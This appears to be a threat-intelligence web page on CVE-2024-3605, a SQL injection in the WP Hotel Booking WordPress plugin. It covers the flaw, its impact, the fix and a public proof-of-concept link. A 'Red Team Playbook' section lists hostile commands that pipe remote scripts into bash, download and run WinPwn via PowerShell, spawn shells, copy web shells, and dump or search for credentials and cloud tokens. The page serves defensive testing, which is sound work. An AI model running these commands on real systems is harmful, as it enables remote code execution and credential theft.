CVE-2024-3605
Overview
This vulnerability is a SQL Injection affecting the WP Hotel Booking plugin for WordPress. The root cause is insufficient sanitization and escaping of the 'room_type' parameter in the /wphb/v1/rooms/search-rooms REST API endpoint. The plugin's query construction mechanism fails to properly prepare SQL statements, allowing user input to be directly injected into the database query executed by the affected component.
Vulnerability Description
The WP Hotel Booking plugin for WordPress is vulnerable to SQL Injection via the 'room_type' parameter of the /wphb/v1/rooms/search-rooms REST API endpoint in all versions up to, and including, 2.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Impact
An unauthenticated attacker can exploit this SQL Injection to execute arbitrary SQL commands on the WordPress database, potentially extracting sensitive data such as user credentials or booking information. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), and the vulnerability affects the confidentiality, integrity, and availability of the application (C:H/I:H/A:H). This can lead to data breaches and compromise of the backend database, severely impacting business operations and customer trust.
Solution
Users should upgrade the WP Hotel Booking plugin to a version later than 2.1.0 where this vulnerability is addressed. Detailed patch information and updates are available through the WordPress plugin repository and Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/5931ad4e-7de3-41ac-b783-f7e58aaef569). Applying the latest plugin update replaces the vulnerable REST API handling and implements proper SQL query preparation to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the WP Hotel Booking plugin for WordPress stems from a critical SQL Injection flaw that affects the '/wphb/v1/rooms/search-rooms' REST API endpoint. This issue arises from inadequate escaping of the 'room_type' parameter, allowing attackers to manipulate SQL queries executed by the application. When user input is not properly sanitized, it opens the door for unauthorized SQL commands to be appended to legitimate queries. This exploitation can lead to unauthorized access to sensitive data stored in the database, including user credentials, payment information, and other confidential records.
Attackers can exploit this vulnerability through various vectors, primarily by sending crafted requests to the vulnerable endpoint. An unauthenticated user can easily manipulate the 'room_type' parameter in the API request to inject malicious SQL code. For instance, an attacker might append a UNION SELECT statement to retrieve data from other tables within the database. This type of attack can be executed remotely, making it particularly dangerous, as it does not require prior authentication or access to the system. The ease of exploitation, combined with the potential for significant data exposure, underscores the severity of this vulnerability.
The real-world impact of this SQL Injection flaw can be profound, especially for businesses relying on the WP Hotel Booking plugin for their operations. Successful exploitation can lead to data breaches, resulting in the exposure of sensitive customer information and potentially damaging the organization's reputation. Furthermore, the financial implications can be severe, including regulatory fines for non-compliance with data protection laws, loss of customer trust, and the costs associated with incident response and remediation efforts. The high CVSS score of 9.8 reflects the critical nature of this vulnerability, indicating that organizations must prioritize its resolution to mitigate associated risks.
To detect and mitigate the risks posed by this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and vulnerability assessments can help identify and address weaknesses in the application. Employing Web Application Firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. Additionally, developers should ensure that all user inputs are properly sanitized and validated, using prepared statements or parameterized queries to prevent SQL Injection attacks. Updating the WP Hotel Booking plugin to the latest version, where this vulnerability is patched, is crucial for maintaining a secure environment.
In conclusion, the SQL Injection vulnerability in the WP Hotel Booking plugin represents a significant threat to organizations utilizing this software. The potential for unauthorized data access, coupled with the ease of exploitation, necessitates immediate attention from security professionals. By adopting proactive detection and mitigation strategies, organizations can safeguard their data and maintain the trust of their customers, ultimately reducing the risk of financial and reputational damage.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the CVE-2024-3605 vulnerability in the WP Hotel Booking plugin. This increase in activity coincides with the emergence of new proof-of-concept exploits publicly available on GitHub, which have lowered the barrier for unauthenticated attackers to leverage the SQL injection flaw. Our telemetry indicates that while the EPSS score has slightly declined, the CVSS score has been adjusted to the maximum severity of 10.0, reflecting the critical nature and ease of exploitation of this vulnerability. The convergence of heightened detection activity and accessible exploit code significantly elevates the threat landscape, underscoring an urgent need for defenders to prioritize monitoring and response efforts. Consequently, the risk level associated with CVE-2024-3605 has intensified, as adversaries can now more readily extract sensitive data from vulnerable installations, increasing the potential for widespread data breaches and operational disruption.
Update 2 — May 21, 2026
Recent telemetry from CSURFACE threat intelligence indicates a significant reduction in exploitation attempts targeting CVE-2024-3605, despite the vulnerability’s critical severity. This decline in detection activity suggests that adversaries may be deprioritizing this vector or shifting focus to alternative attack surfaces. Concurrently, the CVSS score has been revised downward from 10.0 to 9.8, reflecting a more precise assessment of exploitability and impact based on emerging evidence. The EPSS score remains high and stable, indicating that while exploitation remains feasible, the immediate threat momentum has plateaued. For defenders, this shift underscores the importance of maintaining vigilance without overestimating current exploitation intensity. The lowered CVSS score does not diminish the vulnerability’s critical nature but suggests a nuanced threat environment where active exploitation is less aggressive than initially projected. Consequently, the overall risk level remains elevated, warranting continued monitoring and response readiness, but with an adjusted perspective on adversary engagement patterns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Thimpress | Wp Hotel Booking | All |
cpe:2.3:a:thimpress:wp_hotel_booking:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-3605
WP Hotel Booking <= 2.1.0 - Unauthenticated SQL Injection
|
RandomRobbieBF | 0 | 0 | 2025-01-12 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3605 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/5931ad4e-7de3-41ac-b783-f7e58aaef569?source=cve |
| wordpress.org |
GitHub CVE
|
https://wordpress.org/plugins/wp-hotel-booking/ |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3105864%40wp-hotel-booking&new=3105864%40wp-hotel-booking&sfp_email=&sfph_mail= |